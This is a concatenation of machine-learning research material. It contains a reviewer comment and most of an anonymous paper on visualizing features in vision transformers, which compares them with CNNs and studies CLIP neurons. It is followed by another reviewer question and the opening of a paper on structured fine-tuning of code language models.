Discrete wavelet transform-based time series analysis and mining. ACM Computing Surveys, 43(2):1–37, 2011. Wei Chen and Ke Shi. A deep learning framework for time series classification using relative position matrix and convolutional neural network. Neurocomputing, 359:384–394, 2019. Yanping Chen, Eamonn Keogh, Bing Hu, Nurjahan Begum, Anthony Bagnall, Abdullah Mueen, and Gustavo Batista. The UCR time series classification archive, 2015. URL www.cs.ucr.edu/~eamonn/time_series_data/. Zhi Chen, Yongguo Liu, Jiajing Zhu, Yun Zhang, Rongjiang Jin, Xia He, Jing Tao, and Lidian Chen. Time-frequency deep metric learning for multivariate time series classification. Neurocomputing, 462:221–237, 2021. Ziqiang Cheng, Yang Yang, Wei Wang, Wenjie Hu, Yueting Zhuang, and Guojie Song. Time2graph: Revisiting time series modeling with dynamic shapelets. Proceedings of the AAAI Conference on Artificial Intelligence, 34(4):3617–3624, 2020. Angus Dempster, François Petitjean, and Geoffrey I. Webb. ROCKET: exceptionally fast and accurate time series classification using random convolutional kernels. Data Mining and Knowledge Discovery, 34(5):1454–1495, 2020. Jonathan F. Donges, Jobst Heitzig, Reik V. Donner, and Jürgen Kurths. Analytical framework for recurrence network analysis of time series. Physical Review E, 85(4):046105, 2012. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale, 2021.
4aJg9e4nvF
In Table 2, multiple ViT models and CNN models are compared to show that ViTs are better at using background information to predict the correct class. The issue is that the ViTs used are more powerful than the CNNs, with more parameters and more computation, and they have consistently better classification accuracies. The comparison is therefore not fair, so the conclusion that "ViTs are better at using background information" is not convincing.
What do Vision Transformers Learn? A Visual Exploration

Anonymous authors
Paper under double-blind review

Abstract

Vision transformers (ViTs) are quickly becoming the de-facto architecture for computer vision, yet we understand very little about why they work and what they learn. While existing studies visually analyze the mechanisms of convolutional neural networks, an analogous exploration of ViTs remains challenging. In this paper, we first address the obstacles to performing visualizations on ViTs. Assisted by these solutions, we observe that neurons in ViTs trained with language model supervision (e.g., CLIP) are activated by semantic concepts rather than visual features. We also explore the underlying differences between ViTs and CNNs, and we find that transformers detect image background features, just like their convolutional counterparts, but their predictions depend far less on high-frequency information. On the other hand, both architecture types behave similarly in the way features progress from abstract patterns in early layers to concrete objects in late layers. In addition, we show that ViTs maintain spatial information in all layers except the final layer. In contrast to previous works, we show that the last layer most likely discards the spatial information and behaves as a learned global pooling operation. Finally, we conduct large-scale visualizations on a wide range of ViT variants, including DeiT, CoaT, ConViT, PiT, Swin, and Twin, to validate the effectiveness of our method.

Figure 1: The progression of visualized features of ViT B-32. Features from early layers capture general edges and textures. Moving into deeper layers, features evolve to capture more specialized image components and finally concrete objects.

1 Introduction

Recent years have seen the rapid proliferation of vision transformers (ViTs) across a diverse range of tasks from image classification to semantic segmentation to object detection (Dosovitskiy et al., 2020; He et al., 2021; Dong et al., 2021; Liu et al., 2021; Zhai et al., 2021; Dai et al., 2021). Despite their enthusiastic adoption and the constant introduction of architectural innovations, little is known about the inductive biases or features they tend to learn. While feature visualizations and image reconstructions have provided a looking glass into the workings of CNNs (Olah et al., 2017; Zeiler & Fergus, 2014; Dosovitskiy & Brox, 2016), these methods have shown less success for understanding ViT representations, which are difficult to visualize. In this work we show that, if properly applied to the correct representations, feature visualizations can indeed succeed on ViTs. This insight allows us to visually explore ViTs and the information they glean from images.

In order to investigate the behaviors of vision transformers, we first establish a visualization framework that incorporates improved techniques for synthesizing images that maximally activate neurons. By dissecting and visualizing the internal representations in the transformer architecture, we find that patch tokens preserve spatial information throughout all layers except the last attention block. The last layer of ViTs learns a token-mixing operation akin to average pooling, such that the classification head exhibits comparable accuracy when ingesting a random token instead of the CLS token. After probing the role of spatial information, we delve into the behavioral differences between ViTs and CNNs.
When performing activation maximizing visualizations, we notice that ViTs consistently generate higher quality image backgrounds than CNNs. Thus, we try masking out image foregrounds during inference, and find that ViTs consistently outperform CNNs when exposed only to image backgrounds. These findings bolster the observation that transformer models extract information from many sources in an image to exhibit superior performance on out-of-distribution generalization (Paul & Chen, 2021) as well as adversarial robustness (Shao et al., 2021). Additionally, convolutional neural networks are known to rely heavily on high-frequency texture information in images (Geirhos et al., 2018). In contrast, we find that ViTs perform well even when high-frequency content is removed from their inputs. While vision-only models contain simple features corresponding to distinct physical objects and shapes, we find that language supervision in CLIP (Radford et al., 2021) results in neurons that respond to complex abstract concepts. This includes neurons that respond to visual characteristics relating to parts of speech (e.g. epithets, adjectives, and prepositions), a “music” neuron that responds to a wide range of visual scenes, and even a “death neuron” that responds to the abstract concept of morbidity. Our contributions are summarized as follows: I. We observe that uninterpretable and adversarial behavior occurs when applying standard methods of feature visualization to the relatively low-dimensional components of transformer-based models, such as keys, queries, or values. However, applying these tools to the relatively high-dimensional features of the position-wise feedforward layer results in successful and informative visualizations. We conduct large-scale visualizations on a wide range of transformer-based vision models, including ViTs, DeiT, CoaT, ConViT, PiT, Swin, and Twin, to validate the effectiveness of our method. II. We show that patch-wise image activation patterns for ViT features essentially behave like saliency maps, highlighting the regions of the image a given feature attends to. This behavior persists even for relatively deep layers, showing the model preserves the positional relationship between patches instead of using them as global information stores. III. We compare the behavior of ViTs and CNNs, finding that ViTs make better use of background information and rely less on high-frequency, textural attributes. Both types of networks build progressively more complex representations in deeper layers and eventually contain features responsible for detecting distinct objects. IV. We investigate the effect of natural language supervision with CLIP on the types of features extracted by ViTs. We find CLIP-trained models include various features clearly catered to detecting components of images corresponding to caption text, such as prepositions, adjectives, and conceptual categories. 2 RELATED WORK 2.1 OPTIMIZATION-BASED VISUALIZATION One approach to understanding what models learn during training is using gradient descent to produce an image which conveys information about the inner workings of the model. This has proven to be a fruitful line of work in the case of understanding CNNs specifically. The basic strategy underlying this approach is to optimize over input space to find an image which maximizes a particular attribute of the model. For example, Erhan et al. 
(2009) use this approach to visualize images which maximally activate specific neurons in early layers of a network, and Olah et al. (2017) extend this to neurons, channels, and layers throughout a network. Simonyan et al. (2014) and Yin et al. (2020) produce images which maximize the score a model assigns to a particular class. Mahendran & Vedaldi (2015) apply a similar method to invert the feature representations of particular image examples. Recent work by Ghiasi et al. (2021) has studied techniques for extending optimization-based class visualization to ViTs. We incorporate and adapt some of these proposed techniques into our scheme for feature visualization.

2.2 Other Visualization Approaches

Aside from optimization-based methods, many other ways to visualize CNNs have been proposed. Dosovitskiy & Brox (2016) train an auxiliary model to invert the feature representations of a CNN. Zeiler & Fergus (2014) use 'deconvnets' to visualize patches which strongly activate features in various layers. Simonyan et al. (2014) introduce saliency maps, which use gradient information to identify what parts of an image are important to the model's classification output. Zimmermann et al. (2021) demonstrate that natural image samples which maximally activate a feature in a CNN may be more informative than generated images which optimize that feature. We draw on some aspects of these approaches and find that they are useful for visualizing ViTs as well.

2.3 Understanding ViTs

Given their rapid proliferation, there is naturally great interest in how ViTs work and how they may differ from CNNs. Although direct visualization of their features has not previously been explored, there has been recent progress in analyzing the behavior of ViTs. Paul & Chen (2021), Naseer et al. (2021), and Shao et al. (2021) demonstrate that ViTs are inherently robust to many kinds of adversarial perturbations and corruptions. Raghu et al. (2021) compare how the internal representation structure and use of spatial information differ between ViTs and CNNs. Chefer et al. (2021) produce 'image relevance maps' (which resemble saliency maps) to promote interpretability of ViTs.

3 ViT Feature Visualization

Like many visualization techniques, we take gradient steps to maximize feature activations starting from random noise (Olah et al., 2017). To improve the quality of our images, we penalize total variation (Mahendran & Vedaldi, 2015), and also employ the jitter augmentation (Yin et al., 2020), the ColorShift augmentation, and augmentation ensembling (Ghiasi et al., 2021). Finally, we find that Gaussian smoothing facilitates better visualization in our experiments, as is common in feature visualization (Smilkov et al., 2017; Cohen et al., 2019).

Each of the above techniques can be formalized as follows. A ViT represents each patch \( p \) (of an input \( x \)) at layer \( l \) by an array \( A_{l,p} \) with \( d \) entries. We define a feature vector \( f \) to be a stack composed of one entry from each of these arrays. Let \( f_{l,i} \) be formed by concatenating the \( i \)th entry of \( A_{l,p} \) for all patches \( p \); this vector has dimension equal to the number of patches. The optimization objective starts by maximizing the sum of the entries of \( f \) over inputs \( x \). The main loss is then
\[ L_{\text{main}}(x, l, i) = \sum_p (f_{l,i})_p. \]
We employ total variation regularization by adding the term \( \lambda TV(x) \) to the objective.
\( TV \) represents the total variation, and \( \lambda \) is the hyperparameter controlling the strength of its regularization effect. We can ensemble augmentations of the input to further improve results. Let \( A \) define a distribution of augmentations to be applied to the input image \( x \), and let \( a \) be a sample from \( A \). To create a minibatch of inputs from a single image, we sample several augmentations \( \{a_k\} \) from \( A \). Finally, the optimization problem is: \[ x^* = \arg\max_x \sum_k L_{\text{main}}(a_k(x), l, i) + \lambda TV(a_k(x)). \] We achieve the best visualizations when \( A \) is \( GS(CS(Jitter(x))) \), where \( GS \) denotes Gaussian smoothing and \( CS \) denotes ColorShift, whose formulas are: \[ GS(x) = x + \epsilon; \quad \epsilon \sim \mathcal{N}(0, 1) \] Figure 2: (a): Example feature visualization from ViT feed forward layer. Left: Image optimized to maximally activate a feature from layer 5. Center: Corresponding maximally activating ImageNet example. Right: The image’s patch-wise activation map. (b): A feature from the last layer most activated by shopping carts. \[ CS(x) = \sigma x + \mu; \quad \mu \sim U(-1, 1); \quad \sigma \sim e^{U(-1, 1)}. \] Note that even though \( \epsilon \) and \( \mu \) are both additive noise, they act on the input differently since \( \mu \) is applied per channel (i.e. has dimension three), and \( \epsilon \) is applied per pixel. For more details on hyperparameters, refer to Appendix C. To better understand the content of a visualized feature, we pair every visualization with images from the ImageNet validation/train set that most strongly activate the relevant feature. Moreover, we plot the feature’s activation pattern by passing the most activating images through the network and showing the resulting pattern of feature activations. Figure 2(a) is an example of such a visualization. From the leftmost panel, we hypothesize that this feature corresponds to gravel. The most activating image from the validation set (middle) contains a lizard on a pebbly gravel road. Interestingly, the gravel background lights up in the activation pattern (right), while the lizard does not. The activation pattern in this example behaves like a saliency map (Simonyan et al., 2014), and we explore this phenomenon across different layers of the network further in Section 4. The model we adopt for the majority of our demonstrations throughout the paper is ViT-B/16, implemented based on the work of Dosovitskiy et al. (2020). In addition, in the Appendix, we conduct large-scale visualizations on a wide range of ViT variants, including DeiT (Touvron et al., 2021a), CoaT (Xu et al., 2021), ConViT (d’Ascoli et al., 2021), PiT (Heo et al., 2021), Swin (Liu et al., 2021), and Twin (Chu et al., 2021), 38 models in total, to validate the effectiveness of our method. ViT-B/16 is composed of 12 blocks, each consisting of multi-headed attention layers, followed by a projection layer for mixing attention heads, and finally followed by a position-wise-feed-forward layer. For brevity, we henceforth refer to the position-wise-feed-forward layer simply as the feed-forward layer. In this model, every patch is always represented by a vector of size 768 except in the feed-forward layer which has a size of 3072 (4 times larger than other layers). We first attempt to visualize features of the multi-headed attention layer, including visualization of the keys, queries, and values, by performing activation maximization. 
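To make this recipe concrete, below is a minimal sketch of the activation-maximization loop, applied here to a feed-forward (GELU) feature. It assumes a timm ViT-B/16 whose MLP activation can be hooked at `model.blocks[5].mlp.act`; the feature index, step count, and \( \lambda \) are illustrative choices, and the augmentations follow the GS, CS, and Jitter formulas given above.

```python
import torch
import timm

# Pretrained ViT; we optimize only the input image, never the weights.
model = timm.create_model("vit_base_patch16_224", pretrained=True).eval()
for p in model.parameters():
    p.requires_grad_(False)

acts = {}
# Hook the GELU output of block 5's feed-forward layer: (B, tokens, 3072).
model.blocks[5].mlp.act.register_forward_hook(
    lambda mod, inp, out: acts.update(feat=out))

def jitter(x, max_shift=8):
    dx, dy = torch.randint(-max_shift, max_shift + 1, (2,)).tolist()
    return torch.roll(x, shifts=(dx, dy), dims=(2, 3))

def color_shift(x):  # CS(x) = sigma * x + mu, mu and sigma drawn per channel
    mu = torch.empty(1, 3, 1, 1).uniform_(-1, 1)
    sigma = torch.empty(1, 3, 1, 1).uniform_(-1, 1).exp()
    return sigma * x + mu

def gs(x):  # GS(x) = x + eps, eps ~ N(0, 1) per pixel
    return x + torch.randn_like(x)

def tv(x):  # total variation penalty for smoother images
    return ((x[..., 1:, :] - x[..., :-1, :]).abs().mean()
            + (x[..., :, 1:] - x[..., :, :-1]).abs().mean())

feature_idx, lam = 42, 1e-3              # illustrative hyperparameters
x = torch.rand(1, 3, 224, 224, requires_grad=True)
opt = torch.optim.Adam([x], lr=0.1)

for step in range(400):
    opt.zero_grad()
    loss = torch.zeros(())
    for _ in range(4):                   # ensemble several augmentations
        aug = gs(color_shift(jitter(x)))
        model(aug)                       # fills acts["feat"] via the hook
        # maximize the channel summed over patch tokens (CLS is index 0)
        loss = loss - acts["feat"][0, 1:, feature_idx].sum() + lam * tv(aug)
    loss.backward()
    opt.step()
```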
We find that the visualized feed-forward features are significantly more interpretable than those of other layers. We attribute the difficulty of visualizing other layers to the fact that ViTs pack a tremendous amount of information into only 768 features (e.g., in keys, queries, and values), which then behave similarly to the multi-modal neurons discussed by Goh et al. (2021), with many semantic concepts encoded in a low-dimensional space. Furthermore, we find that this behavior is more extreme in deeper layers. See Figure 3 for examples of visualizations of keys, queries, and values in both early and deep layers of the ViT.

Figure 3: Left: Visualization of key, query, and value. The visualization fails both to extract interpretable features and to distinguish between early and deep layers; high-frequency patterns and adversarial behavior dominate. Right: ViT feed-forward layer. The first linear layer increases the dimension of the feature space, and the second one brings it back to its initial dimension.

Figure 5: Feature activation maps in internal layers can effectively segment the contents of an image with respect to a semantic concept. For each image triple, the visualization on top shows the result of our method, the image on the bottom left is the most activating image from the validation set, and the image on the bottom right shows the activation pattern.

Inspired by these observations, we visualize the features within the feed-forward layer across all 12 blocks of the ViT. We refer to these blocks interchangeably as layers. The feed-forward layer depicted in Figure 4 takes an input of size $d = 768$, projects it into a $t = 4$ times higher-dimensional space, applies the non-linearity GELU, and then projects back to the $d$-dimensional space. Unless otherwise stated, we always visualize the output of the GELU layers in our experiments. We hypothesize that the network exploits these high-dimensional spaces to store relatively disentangled representations. On the other hand, compressing the features into a lower-dimensional space may result in the jumbling of features, yielding uninterpretable visualizations.

4 Last-Layer Token Mixing

In this section, we investigate the preservation of patch-wise spatial information observed in the visualizations of patch-wise feature activation levels which, as noted before, bear some similarity to saliency maps. Figure 2(a) demonstrates this phenomenon in layer 5, where the visualized feature is strongly activated for almost all rocky patches but not for patches that include the lizard. Additional examples can be seen in Figure 5 and the Appendix, where the activation maps approximately segment the image with respect to some relevant aspect of the image.

We find it surprising that even though every patch can influence the representation of every other patch, these representations remain local, even for individual channels in deep layers of the network. While a similar finding for CNNs, whose neurons may have a limited receptive field, would be unsurprising, even neurons in the first layer of a ViT have a complete receptive field. In other words, ViTs learn to preserve spatial information, despite lacking the inductive bias of CNNs. Spatial information in patches of deep layers has been explored in Raghu et al. (2021) through the CKA similarity measure, and we further show that spatial information is in fact present in individual channels.
The last layer of the network, however, departs from this behavior and instead appears to serve a role similar to average pooling. We include quantitative justification to support this claim in Appendix section C. Figure 2(b) shows one example of our visualizations for a feature from the last layer that is activated by shopping carts. The activation pattern is fairly uniform across the image.

For classification purposes, ViTs use a fully connected layer applied only on the class token (the CLS token). It is possible that the network globalizes information in the last layer to ensure that the CLS token has access to the entire image, but because the CLS token is treated the same as every other patch by the transformer, this seems to be achieved by globalizing across all tokens. Based on the preservation of spatial information in patches, we hypothesize that the CLS token plays a relatively minor role throughout the network and is not used for globalization until the last layer. To demonstrate this, we perform inference on images without using the CLS token in layers 1-11, meaning that in these layers, each patch only attends to other patches and not to the CLS token. At layer 12, we then insert a value for the CLS token so that other patches can attend to it and vice versa. This value is obtained by running a forward pass using only the CLS token and no image patches; this value is constant across all input images. The resulting hacked network that only has CLS access in the last layer can still successfully classify 78.61% of the ImageNet validation set, as shown in Table 1.

Table 1: After the last layer, every patch contains the same information. "Isolating CLS" denotes the experiment where attention is only performed between patches before the final attention block, while "Patch Average" and "Patch Maximum" refer to the experiment in which the classification head is placed on top of individual patches without fine-tuning. Experiments conducted on ViT-B16.

| Accuracy | Natural Accuracy | Isolating CLS | Patch Average | Patch Maximum |
|----------|------------------|---------------|---------------|---------------|
| Top 1 | 84.20 | 78.61 | 75.75 | 80.16 |
| Top 5 | 97.16 | 94.18 | 90.99 | 95.65 |

From this result, we conclude that the CLS token captures global information mostly at the last layer, rather than building a global representation throughout the network.

We perform a second experiment to show that this last-layer globalization behavior is not exclusive to the CLS token, but actually occurs across every patch in the last layer. We take the fully connected layer trained to classify images on top of the CLS token, and without any fine-tuning or adaptation, we apply it to each patch, one at a time. This setup still successfully classifies 75.75% of the validation set, on average across individual patches, and the patch with the maximum performance achieves 80.16% accuracy (see Table 1), further confirming that the last layer performs a token-mixing operation so that all tokens contain roughly identical information. Figure 6 contains a heat-map depicting the performance of this setup across spatial patches. This observation stands in stark contrast to the suggestions of Raghu et al. (2021) that ViTs possess strong localization throughout the entire network, and their further hypothesis that the addition of global pooling is required for mixing tokens at the end of the network.
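The patch-wise probe in this second experiment is easy to reproduce; the following is a minimal sketch, assuming a timm VisionTransformer whose `forward_features` returns the full normalized token sequence with the CLS token at index 0 (true for recent timm versions), so that the stock classification head can be applied to each patch token without fine-tuning.

```python
import torch
import timm

model = timm.create_model("vit_base_patch16_224", pretrained=True).eval()

@torch.no_grad()
def per_patch_accuracy(images, labels):
    """Apply the CLS classification head to every patch token, unmodified."""
    tokens = model.forward_features(images)   # (B, 1 + num_patches, 768)
    patch_tokens = tokens[:, 1:, :]           # drop the CLS token
    logits = model.head(patch_tokens)         # (B, num_patches, 1000)
    preds = logits.argmax(dim=-1)             # one prediction per patch
    correct = (preds == labels[:, None]).float()
    return correct.mean(dim=0)                # accuracy per patch position
```

Averaging the returned vector over the validation set would correspond to the "Patch Average" quantity, and its maximum entry to "Patch Maximum".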
We conclude by noting that the information structure of a ViT is remarkably similar to a CNN, in the sense that the information is positionally encoded and preserved until the final layer. Furthermore, the final layer in ViTs appears to behave as a learned global pooling operation that aggregates information from all patches, which is similar to its explicit average-pooling counterpart in CNNs.

5 COMPARISON OF ViTs AND CNNs

As extensive work has been done to understand the workings of convolutional networks, including feature visualization and image reconstruction techniques similar to those used here, we may be able to learn more about ViT behavior via direct comparison to CNNs. An important observation is that in CNNs, early layers recognize color, edges, and texture, while deeper layers pick out increasingly complex structures, eventually leading to entire objects (Olah et al., 2017). Visualization of features from different layers in a ViT, such as those in Figures 1 and 7, reveals that ViTs exhibit this kind of progressive specialization as well.

Figure 7: Complexity of features vs depth in ViT B-32. Visualizations suggest that ViTs are similar to CNNs in that they show a feature progression from textures to parts to objects as we progress from shallow to deep features.

On the other hand, we observe that there are also important differences between the ways CNNs and ViTs recognize images. In particular, we examine the reliance of ViTs and CNNs on background and foreground image features using the bounding boxes provided by ImageNet (Deng et al., 2009). We filter the ImageNet-1k training images and only use those which are accompanied by bounding boxes. If several objects are present in an image, we only take the bounding boxes corresponding to the true class label and ignore the additional bounding boxes. Figure 8(b) shows an example of an image and variants in which the background and foreground, respectively, are masked.

Figure 8: (a): ViT-B16 detects background features. Left: Image optimized to maximally activate a feature from layer 6. Center: Corresponding maximally activating example from ImageNet. Right: The image's patch-wise activation map. (b): An example of an original image and masked-out foreground and background.

Figure 8(a) displays an example of ViTs' ability to detect background information present in the ImageNet dataset. This particular feature appears responsible for recognizing the pairing of grass and snow. The rightmost panel indicates that this feature is solely activated by the background, and not at all by the patches of the image containing parts of the wolf.

To quantitatively assess each architecture's dependence on different parts of the image at the dataset level, we mask out the foreground or background on a set of evaluation images using the aforementioned ImageNet bounding boxes, and we measure the resulting change in top-5 accuracy. These tests are performed across a number of pretrained ViT models and a set of common CNNs in Table 2; further results can be found in Table 3. We observe that ViTs are significantly better than CNNs at using the background information in an image to identify the correct class. At the same time, ViTs also suffer noticeably less from the removal of the background, and thus seem to depend less on the background information to make their classification.
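A sketch of the masking step follows, under the assumption that each image comes with pixel-coordinate bounding boxes for its labeled class; the helper name and fill value are illustrative, not the paper's exact implementation.

```python
import torch

def mask_regions(images, boxes, mode="foreground", fill=0.0):
    """Hide either the bounding-box interiors (foreground) or everything
    outside them (background).

    images: (B, 3, H, W) tensor; boxes: per-image list of [x0, y0, x1, y1].
    """
    out = images.clone()
    for i, img_boxes in enumerate(boxes):
        fg = torch.zeros(out.shape[2:], dtype=torch.bool)
        for x0, y0, x1, y1 in img_boxes:
            fg[y0:y1, x0:x1] = True          # mark box interiors as foreground
        view = out[i]                        # (3, H, W) view into out
        view[:, fg if mode == "foreground" else ~fg] = fill
    return out
```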
A possible, and likely, confounding variable here is the imperfect separation of the background from the foreground in the ImageNet bounding box data set. A rectangle containing the wolf in Figure 8(a), for example, would also contain a small amount of the grass and snow at the wolf's feet. However, the foreground is typically contained entirely in a bounding box, so masking out the bounding box interiors is highly effective at removing the foreground. Because ViTs are better equipped to make sense of background information, the leaked background may be useful for maintaining superior performance. Nonetheless, these results suggest that ViTs consistently outperform CNNs when information, either foreground or background, is missing.

Table 2: ViTs more effectively correlate background information with correct class. Both foreground and background data are normalized by full image top-5 accuracy.

| Architecture | Full Image | Foreground | Background |
|--------------|------------|------------|------------|
| ViT-B32 | 98.44 | 93.91 | 28.10 |
| ViT-L16 | 99.57 | 96.18 | 33.69 |
| ViT-L32 | 99.32 | 93.89 | 31.07 |
| ViT-B16 | 99.22 | 95.64 | 31.59 |
| DeiT-B16 | 99.86 | 94.98 | 38.29 |
| ConViT-B | 99.78 | 94.89 | 37.09 |
| Swin-L4 | 99.67 | **97.04** | **44.50** |
| EfficientNetB5 | 99.57 | 92.16 | 22.29 |
| EfficientNetB6 | 99.29 | 92.52 | 23.05 |
| EfficientNetB7 | 99.42 | 93.23 | 23.28 |
| ResNet-50 | 98.00 | 89.69 | 18.69 |
| ResNet-152 | 98.85 | 90.74 | 19.68 |
| MobileNetv2 | 96.09 | 86.84 | 15.94 |
| DenseNet121 | 96.55 | 89.58 | 17.53 |

Next, we study the role of texture in ViT predictions. To this end, we filter out high-frequency components from ImageNet test images via low-pass filtering. While the predictions of ResNets suffer greatly when high-frequency texture information is removed from their inputs, ViTs are seemingly resilient. See Figure 15 for the decay in accuracy of ViT and ResNet models as textural information is removed.

6 ViTs with Language Model Supervision

Recently, ViTs have been used as a backbone to develop image classifiers trained with natural language supervision and contrastive learning techniques (Radford et al., 2021). These CLIP models are state-of-the-art in transfer learning to unseen datasets. The zero-shot ImageNet accuracy of these models is even competitive with traditionally trained ResNet-50 competitors. We compare the feature visualizations for ViT models with and without CLIP training to study the effect of natural language supervision on the behavior of the transformer-based backbone.

The training objective for CLIP models consists of matching the correct caption from a list of options with an input image (in feature space). Intuitively, this procedure requires the network to extract features suitable not only for detecting nouns (e.g., simple class labels like 'bird'), but also for modifying phrases like prepositions and epithets. Indeed, we observe several such features that are not present in ViTs trained solely as image classifiers.

Figure 9: Left: Feature optimization shows sharp boundaries, and maximally activating ImageNet examples contain distinct, adjacent images. Middle: Feature optimization and maximally activating ImageNet photos all show images from an elevated vantage point. Right: Feature optimization shows a crowd of people, but maximally activating images indicate that the repetition of objects is more relevant than the type of object.
Figure 9(a) shows the image optimized to maximally activate a feature of a ViT CLIP model alongside its two highest activating examples from the ImageNet dataset. The fact that all three images share sharp boundaries indicates that this feature might be responsible for detecting caption text relating to a progression of images. Examples could include "before and after," as in the airport images, or the adjective "step-by-step" for the iPod teardown. Similarly, Figures 9(b) and 9(c) depict visualizations from features which seem to detect the preposition "from above" and adjectives relating to a multitude of the same object, respectively.

The presence of features that represent conceptual categories is another consequence of CLIP training. Unlike ViTs trained as classifiers, in which features detect single objects or common background information, CLIP-trained ViTs produce features in deeper layers activated by objects in clearly discernible conceptual categories. For example, the top left panel of Figure 10(a) shows a feature activated by what resembles skulls alongside tombstones. The corresponding seven highly activating images from the dataset include other distinct objects such as bloody weapons, zombies, and skeletons. From a strictly visual point of view, these classes have very dissimilar attributes, indicating that this feature might be responsible for detecting components of an image relating broadly to morbidity. In Figure 10(b), we see that the top leftmost panel shows a disco ball, and the corresponding images from the dataset contain boomboxes, speakers, a record player, audio recording equipment, and a performer. Again, these are visually distinct classes, yet they are all united by the concept of music. Given that the space of possible captions for images is substantially larger than the mere one thousand classes in the ImageNet dataset, high-performing CLIP models understandably require higher-level organization for the objects they recognize. Moreover, the CLIP dataset is scraped from the internet, where captions are often more descriptive than simple class labels.

7 DISCUSSION

In order to dissect the inner workings of vision transformers, we introduce a framework for optimization-based feature visualization. We then identify which components of a ViT are most amenable to producing interpretable images, finding that the high-dimensional inner projection of the feed-forward layer is suitable while the key, query, and value features of self-attention are not. Applying this framework to these features, we observe that ViTs preserve the spatial information of the patches, even for individual channels, across all layers with the exception of the last layer, indicating that the networks learn spatial relationships from scratch. We further show that the sudden disappearance of localization information in the last attention layer results from a learned token-mixing behavior that resembles average pooling.

In comparing CNNs and ViTs, we find that ViTs make better use of background information and make vastly superior predictions relative to CNNs when exposed only to image backgrounds. This holds despite the seemingly counter-intuitive fact that ViTs are less sensitive than CNNs to the loss of high-frequency information, which one might expect to be critical for making effective use of background. We also conclude that the two architectures share a common property whereby earlier layers learn textural attributes, whereas deeper layers learn high-level object features or abstract concepts.
Finally, we show that ViTs trained with language model supervision learn more semantic and conceptual features, rather than the object-specific visual features typical of classifiers.

REPRODUCIBILITY STATEMENT

We make our code repository available at: https://github.com/anonymous2023iclr/ViTVis

REFERENCES

Hila Chefer, Shir Gur, and Lior Wolf. Transformer interpretability beyond attention visualization. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 782–791, 2021.

Xiangxiang Chu, Zhi Tian, Yuqing Wang, Bo Zhang, Haibing Ren, Xiaolin Wei, Huaxia Xia, and Chunhua Shen. Twins: Revisiting the design of spatial attention in vision transformers. arXiv preprint arXiv:2104.13840, 2021.

Jeremy Cohen, Elan Rosenfeld, and Zico Kolter. Certified adversarial robustness via randomized smoothing. In International Conference on Machine Learning, pp. 1310–1320. PMLR, 2019.

Zihang Dai, Hanxiao Liu, Quoc V Le, and Mingxing Tan. Coatnet: Marrying convolution and attention for all data sizes. arXiv preprint arXiv:2106.04803, 2021.

Stéphane d'Ascoli, Hugo Touvron, Matthew Leavitt, Ari Morcos, Giulio Biroli, and Levent Sagun. Convit: Improving vision transformers with soft convolutional inductive biases. arXiv preprint arXiv:2103.10697, 2021.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255. IEEE, 2009.

Xiaoyi Dong, Jianmin Bao, Ting Zhang, Dongdong Chen, Weiming Zhang, Lu Yuan, Dong Chen, Fang Wen, and Nenghai Yu. Peco: Perceptual codebook for bert pre-training of vision transformers. arXiv preprint arXiv:2111.12710, 2021.

Alexey Dosovitskiy and Thomas Brox. Inverting visual representations with convolutional networks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 4829–4837, 2016.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2020.

Dumitru Erhan, Yoshua Bengio, Aaron Courville, and Pascal Vincent. Visualizing higher-layer features of a deep network. University of Montreal, 1341(3):1, 2009.

Robert Geirhos, Patricia Rubisch, Claudio Michaelis, Matthias Bethge, Felix A Wichmann, and Wieland Brendel. Imagenet-trained cnns are biased towards texture; increasing shape bias improves accuracy and robustness. arXiv preprint arXiv:1811.12231, 2018.

Amin Ghiasi, Hamid Kazemi, Steven Reich, Chen Zhu, Micah Goldblum, and Tom Goldstein. Plug-in inversion: Model-agnostic inversion for vision with data augmentations. 2021.

Gabriel Goh, Nick Cammarata, Chelsea Voss, Shan Carter, Michael Petrov, Ludwig Schubert, Alec Radford, and Chris Olah. Multimodal neurons in artificial neural networks. Distill, 6(3):e30, 2021.

Kaiming He, Xinlei Chen, Saining Xie, Yanghao Li, Piotr Dollár, and Ross Girshick. Masked autoencoders are scalable vision learners. arXiv preprint arXiv:2111.06377, 2021.
YKIGyf215Q
- How do you assess the cost/benefit trade-off of (a) requiring parseable code and (b) increasing the length of the program's representation in terms of tokens, given that the most common use case of LLMs for code is code generation, often in incomplete contexts?
Structured Fine-Tuning Enables Data-Efficient Adaptation of Code Language Models

Anonymous authors
Paper under double-blind review

Abstract

Current models tailored for code tasks often adopt the successful pre-training-then-fine-tuning paradigm from natural language processing, treating source code as plain text, just as natural language is treated. This approach, however, overlooks the well-defined and unambiguous structures inherent in programming languages. In this work, we explore a data-efficient adaptation of pre-trained code language models by further training and fine-tuning them with program structures, which significantly improves the performance of downstream coding tasks. Specifically, we represent programs as parse trees, also known as concrete syntax trees (CSTs), and refine a model with serialized CSTs. Fine-tuning with structures encourages the model to learn not only the associations of code text in different languages but also the mappings of their structures and grammars, using only a small amount of data (e.g., 100 examples). With a focus on generation, we design training objectives for encoder-decoder and decoder-only architectures. We rigorously evaluate the proposed approach on various coding tasks and demonstrate that integrating parse structures with the plain-text representation of source code offers notable advantages, particularly in scenarios of low-data code translation.

1 Introduction

Natural language models consider text as a sequence of tokens, which can be encoded and decoded using neural sequence models. With the attention mechanism considered to be "all you need" (Vaswani et al., 2017), natural language models are extended to programming languages by treating source code as plain text, such that one can conveniently reuse existing self-learning approaches (e.g., masked-token recovery, next-token prediction) for pre-training and fine-tuning. Adapting models from natural languages to code mainly requires curating training data that includes sufficient code. This simple adaptation works well, as demonstrated by the remarkable performance of various code language models (Wang et al., 2021; Chen et al., 2021; Li et al., 2023).

